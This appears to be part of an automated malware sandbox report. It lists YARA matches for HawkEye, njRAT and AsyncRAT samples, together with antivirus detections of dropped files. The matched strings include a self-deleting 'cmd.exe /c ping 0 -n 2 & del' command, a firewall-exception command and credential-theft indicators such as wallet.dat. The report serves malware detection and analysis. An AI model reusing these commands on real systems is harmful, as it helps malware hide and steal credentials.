2.2.pgr.exe.3a3fd88.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
2.2.pgr.exe.3a3fd88.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
2.2.pgr.exe.3a3fd88.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
2.2.pgr.exe.3a3fd88.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.pgr.exe.3a3fd88.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf69:$hawkstr1: HawkEye Keylogger 0x7cd96:$hawkstr1: HawkEye Keylogger 0x7d0c5:$hawkstr1: HawkEye Keylogger 0x7d220:$hawkstr1: HawkEye Keylogger 0x7d383:$hawkstr1: HawkEye Keylogger 0x7d5fc:$hawkstr1: HawkEye Keylogger 0x7badb:$hawkstr2: Dear HawkEye Customers! 0x7d118:$hawkstr2: Dear HawkEye Customers! 0x7d26f:$hawkstr2: Dear HawkEye Customers! 0x7d3d6:$hawkstr2: Dear HawkEye Customers! 0x7bbfc:$hawkstr3: HawkEye Logger Details:
13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e8:$key: HawkEyeKeylogger 0x7dae2:$salt: 099u787978786 0x7bf11:$string1: HawkEye_Keylogger 0x7cd50:$string1: HawkEye_Keylogger 0x7da42:$string1: HawkEye_Keylogger 0x7c2e6:$string2: holdermail.txt 0x7c306:$string2: holdermail.txt 0x7c228:$string3: wallet.dat 0x7c240:$string3: wallet.dat 0x7c256:$string3: wallet.dat 0x7d624:$string4: Keylog Records 0x7d93c:$string4: Keylog Records 0x7db3a:$string5: do not script --> 0x7b8d0:$string6: \pidloc.txt 0x7b92a:$string7: BSPLIT 0x7b93a:$string7: BSPLIT
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf69:$hawkstr1: HawkEye Keylogger 0x7cd96:$hawkstr1: HawkEye Keylogger 0x7d0c5:$hawkstr1: HawkEye Keylogger 0x7d220:$hawkstr1: HawkEye Keylogger 0x7d383:$hawkstr1: HawkEye Keylogger 0x7d5fc:$hawkstr1: HawkEye Keylogger 0x7badb:$hawkstr2: Dear HawkEye Customers! 0x7d118:$hawkstr2: Dear HawkEye Customers! 0x7d26f:$hawkstr2: Dear HawkEye Customers! 0x7d3d6:$hawkstr2: Dear HawkEye Customers! 0x7bbfc:$hawkstr3: HawkEye Logger Details:
12.0.tmp87E4.tmp.exe.6e0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.4027e00.6.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
14.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dc76:$key: HawkEyeKeylogger 0x1fe70:$salt: 099u787978786 0x1e29f:$string1: HawkEye_Keylogger 0x1f0de:$string1: HawkEye_Keylogger 0x1fdd0:$string1: HawkEye_Keylogger 0x1e674:$string2: holdermail.txt 0x1e694:$string2: holdermail.txt 0x1e5b6:$string3: wallet.dat 0x1e5ce:$string3: wallet.dat 0x1e5e4:$string3: wallet.dat 0x1f9b2:$string4: Keylog Records 0x1fcca:$string4: Keylog Records 0x1fec8:$string5: do not script --> 0x1dc5e:$string6: \pidloc.txt 0x1dcb8:$string7: BSPLIT 0x1dcc8:$string7: BSPLIT
13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e2f7:$hawkstr1: HawkEye Keylogger 0x1f124:$hawkstr1: HawkEye Keylogger 0x1f453:$hawkstr1: HawkEye Keylogger 0x1f5ae:$hawkstr1: HawkEye Keylogger 0x1f711:$hawkstr1: HawkEye Keylogger 0x1f98a:$hawkstr1: HawkEye Keylogger 0x1de69:$hawkstr2: Dear HawkEye Customers! 0x1f4a6:$hawkstr2: Dear HawkEye Customers! 0x1f5fd:$hawkstr2: Dear HawkEye Customers! 0x1f764:$hawkstr2: Dear HawkEye Customers! 0x1df8a:$hawkstr3: HawkEye Logger Details:
2.2.pgr.exe.80000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4d30:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e88:$s3: Executed As 0x4e6a:$s6: Download ERROR
2.2.pgr.exe.80000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
2.2.pgr.exe.80000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9e:$a1: netsh firewall add allowedprogram 0x4d6e:$a2: SEE_MASK_NOZONECHECKS 0x5018:$b1: [TAP] 0x4d30:$c3: cmd.exe /c ping
2.2.pgr.exe.80000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6e:$reg: SEE_MASK_NOZONECHECKS 0x4e46:$msg: Execute ERROR 0x4ea2:$msg: Execute ERROR 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
2.0.pgr.exe.80000.0.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4d30:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e88:$s3: Executed As 0x4e6a:$s6: Download ERROR
2.0.pgr.exe.80000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
2.0.pgr.exe.80000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9e:$a1: netsh firewall add allowedprogram 0x4d6e:$a2: SEE_MASK_NOZONECHECKS 0x5018:$b1: [TAP] 0x4d30:$c3: cmd.exe /c ping
2.0.pgr.exe.80000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6e:$reg: SEE_MASK_NOZONECHECKS 0x4e46:$msg: Execute ERROR 0x4ea2:$msg: Execute ERROR 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754e0:$key: HawkEyeKeylogger 0x776da:$salt: 099u787978786 0x75b09:$string1: HawkEye_Keylogger 0x76948:$string1: HawkEye_Keylogger 0x7763a:$string1: HawkEye_Keylogger 0x75ede:$string2: holdermail.txt 0x75efe:$string2: holdermail.txt 0x75e20:$string3: wallet.dat 0x75e38:$string3: wallet.dat 0x75e4e:$string3: wallet.dat 0x7721c:$string4: Keylog Records 0x77534:$string4: Keylog Records 0x77732:$string5: do not script --> 0x754c8:$string6: \pidloc.txt 0x75522:$string7: BSPLIT 0x75532:$string7: BSPLIT
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b61:$hawkstr1: HawkEye Keylogger 0x7698e:$hawkstr1: HawkEye Keylogger 0x76cbd:$hawkstr1: HawkEye Keylogger 0x76e18:$hawkstr1: HawkEye Keylogger 0x76f7b:$hawkstr1: HawkEye Keylogger 0x771f4:$hawkstr1: HawkEye Keylogger 0x756d3:$hawkstr2: Dear HawkEye Customers! 0x76d10:$hawkstr2: Dear HawkEye Customers! 0x76e67:$hawkstr2: Dear HawkEye Customers! 0x76fce:$hawkstr2: Dear HawkEye Customers! 0x757f4:$hawkstr3: HawkEye Logger Details:
3.2.servieda.exe.a0000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
3.2.servieda.exe.a0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
3.2.servieda.exe.a0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
12.2.tmp87E4.tmp.exe.6e0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.0.servieda.exe.a0000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
3.0.servieda.exe.a0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
3.0.servieda.exe.a0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
1.2.Tmp.exe.1d0000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
1.2.Tmp.exe.1d0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
1.2.Tmp.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
15.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8ffa72.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
2.2.pgr.exe.3a46190.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754e0:$key: HawkEyeKeylogger 0x776da:$salt: 099u787978786 0x75b09:$string1: HawkEye_Keylogger 0x76948:$string1: HawkEye_Keylogger 0x7763a:$string1: HawkEye_Keylogger 0x75ede:$string2: holdermail.txt 0x75efe:$string2: holdermail.txt 0x75e20:$string3: wallet.dat 0x75e38:$string3: wallet.dat 0x75e4e:$string3: wallet.dat 0x7721c:$string4: Keylog Records 0x77534:$string4: Keylog Records 0x77732:$string5: do not script --> 0x754c8:$string6: \pidloc.txt 0x75522:$string7: BSPLIT 0x75532:$string7: BSPLIT
2.2.pgr.exe.3a46190.2.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
2.2.pgr.exe.3a46190.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
2.2.pgr.exe.3a46190.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
2.2.pgr.exe.3a46190.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.pgr.exe.3a46190.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b61:$hawkstr1: HawkEye Keylogger 0x7698e:$hawkstr1: HawkEye Keylogger 0x76cbd:$hawkstr1: HawkEye Keylogger 0x76e18:$hawkstr1: HawkEye Keylogger 0x76f7b:$hawkstr1: HawkEye Keylogger 0x771f4:$hawkstr1: HawkEye Keylogger 0x756d3:$hawkstr2: Dear HawkEye Customers! 0x76d10:$hawkstr2: Dear HawkEye Customers! 0x76e67:$hawkstr2: Dear HawkEye Customers! 0x76fce:$hawkstr2: Dear HawkEye Customers! 0x757f4:$hawkstr3: HawkEye Logger Details:
13.2.tmpFB21.tmp.exe.8ffa72.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73adb:$key: HawkEyeKeylogger 0x75cd5:$salt: 099u787978786 0x74104:$string1: HawkEye_Keylogger 0x74f43:$string1: HawkEye_Keylogger 0x75c35:$string1: HawkEye_Keylogger 0x744d9:$string2: holdermail.txt 0x744f9:$string2: holdermail.txt 0x7441b:$string3: wallet.dat 0x74433:$string3: wallet.dat 0x74449:$string3: wallet.dat 0x75817:$string4: Keylog Records 0x75b2f:$string4: Keylog Records 0x75d2d:$string5: do not script --> 0x73ac3:$string6: \pidloc.txt 0x73b1d:$string7: BSPLIT 0x73b2d:$string7: BSPLIT
13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7415c:$hawkstr1: HawkEye Keylogger 0x74f89:$hawkstr1: HawkEye Keylogger 0x752b8:$hawkstr1: HawkEye Keylogger 0x75413:$hawkstr1: HawkEye Keylogger 0x75576:$hawkstr1: HawkEye Keylogger 0x757ef:$hawkstr1: HawkEye Keylogger 0x73cce:$hawkstr2: Dear HawkEye Customers! 0x7530b:$hawkstr2: Dear HawkEye Customers! 0x75462:$hawkstr2: Dear HawkEye Customers! 0x755c9:$hawkstr2: Dear HawkEye Customers! 0x73def:$hawkstr3: HawkEye Logger Details:
8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73adb:$key: HawkEyeKeylogger 0x75cd5:$salt: 099u787978786 0x74104:$string1: HawkEye_Keylogger 0x74f43:$string1: HawkEye_Keylogger 0x75c35:$string1: HawkEye_Keylogger 0x744d9:$string2: holdermail.txt 0x744f9:$string2: holdermail.txt 0x7441b:$string3: wallet.dat 0x74433:$string3: wallet.dat 0x74449:$string3: wallet.dat 0x75817:$string4: Keylog Records 0x75b2f:$string4: Keylog Records 0x75d2d:$string5: do not script --> 0x73ac3:$string6: \pidloc.txt 0x73b1d:$string7: BSPLIT 0x73b2d:$string7: BSPLIT
13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7415c:$hawkstr1: HawkEye Keylogger 0x74f89:$hawkstr1: HawkEye Keylogger 0x752b8:$hawkstr1: HawkEye Keylogger 0x75413:$hawkstr1: HawkEye Keylogger 0x75576:$hawkstr1: HawkEye Keylogger 0x757ef:$hawkstr1: HawkEye Keylogger 0x73cce:$hawkstr2: Dear HawkEye Customers! 0x7530b:$hawkstr2: Dear HawkEye Customers! 0x75462:$hawkstr2: Dear HawkEye Customers! 0x755c9:$hawkstr2: Dear HawkEye Customers! 0x73def:$hawkstr3: HawkEye Logger Details:
13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dc76:$key: HawkEyeKeylogger 0x1fe70:$salt: 099u787978786 0x1e29f:$string1: HawkEye_Keylogger 0x1f0de:$string1: HawkEye_Keylogger 0x1fdd0:$string1: HawkEye_Keylogger 0x1e674:$string2: holdermail.txt 0x1e694:$string2: holdermail.txt 0x1e5b6:$string3: wallet.dat 0x1e5ce:$string3: wallet.dat 0x1e5e4:$string3: wallet.dat 0x1f9b2:$string4: Keylog Records 0x1fcca:$string4: Keylog Records 0x1fec8:$string5: do not script --> 0x1dc5e:$string6: \pidloc.txt 0x1dcb8:$string7: BSPLIT 0x1dcc8:$string7: BSPLIT
13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e2f7:$hawkstr1: HawkEye Keylogger 0x1f124:$hawkstr1: HawkEye Keylogger 0x1f453:$hawkstr1: HawkEye Keylogger 0x1f5ae:$hawkstr1: HawkEye Keylogger 0x1f711:$hawkstr1: HawkEye Keylogger 0x1f98a:$hawkstr1: HawkEye Keylogger 0x1de69:$hawkstr2: Dear HawkEye Customers! 0x1f4a6:$hawkstr2: Dear HawkEye Customers! 0x1f5fd:$hawkstr2: Dear HawkEye Customers! 0x1f764:$hawkstr2: Dear HawkEye Customers! 0x1df8a:$hawkstr3: HawkEye Logger Details:
15.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.pgr.exe.3a3fd88.3.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79ae8:$key: HawkEyeKeylogger 0x7bce2:$salt: 099u787978786 0x7a111:$string1: HawkEye_Keylogger 0x7af50:$string1: HawkEye_Keylogger 0x7bc42:$string1: HawkEye_Keylogger 0x7a4e6:$string2: holdermail.txt 0x7a506:$string2: holdermail.txt 0x7a428:$string3: wallet.dat 0x7a440:$string3: wallet.dat 0x7a456:$string3: wallet.dat 0x7b824:$string4: Keylog Records 0x7bb3c:$string4: Keylog Records 0x7bd3a:$string5: do not script --> 0x79ad0:$string6: \pidloc.txt 0x79b2a:$string7: BSPLIT 0x79b3a:$string7: BSPLIT
2.2.pgr.exe.3a3fd88.3.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
2.2.pgr.exe.3a3fd88.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
2.2.pgr.exe.3a3fd88.3.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
2.2.pgr.exe.3a3fd88.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.pgr.exe.3a3fd88.3.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a169:$hawkstr1: HawkEye Keylogger 0x7af96:$hawkstr1: HawkEye Keylogger 0x7b2c5:$hawkstr1: HawkEye Keylogger 0x7b420:$hawkstr1: HawkEye Keylogger 0x7b583:$hawkstr1: HawkEye Keylogger 0x7b7fc:$hawkstr1: HawkEye Keylogger 0x79cdb:$hawkstr2: Dear HawkEye Customers! 0x7b318:$hawkstr2: Dear HawkEye Customers! 0x7b46f:$hawkstr2: Dear HawkEye Customers! 0x7b5d6:$hawkstr2: Dear HawkEye Customers! 0x79dfc:$hawkstr3: HawkEye Logger Details:
2.2.pgr.exe.3a47b95.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754e0:$key: HawkEyeKeylogger 0x776da:$salt: 099u787978786 0x75b09:$string1: HawkEye_Keylogger 0x76948:$string1: HawkEye_Keylogger 0x7763a:$string1: HawkEye_Keylogger 0x75ede:$string2: holdermail.txt 0x75efe:$string2: holdermail.txt 0x75e20:$string3: wallet.dat 0x75e38:$string3: wallet.dat 0x75e4e:$string3: wallet.dat 0x7721c:$string4: Keylog Records 0x77534:$string4: Keylog Records 0x77732:$string5: do not script --> 0x754c8:$string6: \pidloc.txt 0x75522:$string7: BSPLIT 0x75532:$string7: BSPLIT
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b61:$hawkstr1: HawkEye Keylogger 0x7698e:$hawkstr1: HawkEye Keylogger 0x76cbd:$hawkstr1: HawkEye Keylogger 0x76e18:$hawkstr1: HawkEye Keylogger 0x76f7b:$hawkstr1: HawkEye Keylogger 0x771f4:$hawkstr1: HawkEye Keylogger 0x756d3:$hawkstr2: Dear HawkEye Customers! 0x76d10:$hawkstr2: Dear HawkEye Customers! 0x76e67:$hawkstr2: Dear HawkEye Customers! 0x76fce:$hawkstr2: Dear HawkEye Customers! 0x757f4:$hawkstr3: HawkEye Logger Details:
2.2.pgr.exe.3a47b95.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73adb:$key: HawkEyeKeylogger 0x75cd5:$salt: 099u787978786 0x74104:$string1: HawkEye_Keylogger 0x74f43:$string1: HawkEye_Keylogger 0x75c35:$string1: HawkEye_Keylogger 0x744d9:$string2: holdermail.txt 0x744f9:$string2: holdermail.txt 0x7441b:$string3: wallet.dat 0x74433:$string3: wallet.dat 0x74449:$string3: wallet.dat 0x75817:$string4: Keylog Records 0x75b2f:$string4: Keylog Records 0x75d2d:$string5: do not script --> 0x73ac3:$string6: \pidloc.txt 0x73b1d:$string7: BSPLIT 0x73b2d:$string7: BSPLIT
2.2.pgr.exe.3a47b95.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
2.2.pgr.exe.3a47b95.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
2.2.pgr.exe.3a47b95.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.pgr.exe.3a47b95.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7415c:$hawkstr1: HawkEye Keylogger 0x74f89:$hawkstr1: HawkEye Keylogger 0x752b8:$hawkstr1: HawkEye Keylogger 0x75413:$hawkstr1: HawkEye Keylogger 0x75576:$hawkstr1: HawkEye Keylogger 0x757ef:$hawkstr1: HawkEye Keylogger 0x73cce:$hawkstr2: Dear HawkEye Customers! 0x7530b:$hawkstr2: Dear HawkEye Customers! 0x75462:$hawkstr2: Dear HawkEye Customers! 0x755c9:$hawkstr2: Dear HawkEye Customers! 0x73def:$hawkstr3: HawkEye Logger Details:
13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x20f13:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x18308:$hawkstr1: HawkEye Keylogger 0x1a4c8:$hawkstr1: HawkEye Keylogger 0x1a860:$hawkstr1: HawkEye Keylogger 0x1fc54:$hawkstr1: HawkEye Keylogger 0x17d54:$hawkstr2: Dear HawkEye Customers! 0x1a52c:$hawkstr2: Dear HawkEye Customers! 0x1a8c4:$hawkstr2: Dear HawkEye Customers! 0x17e86:$hawkstr3: HawkEye Logger Details:
Click to see the 127 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\servieda.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Show sources

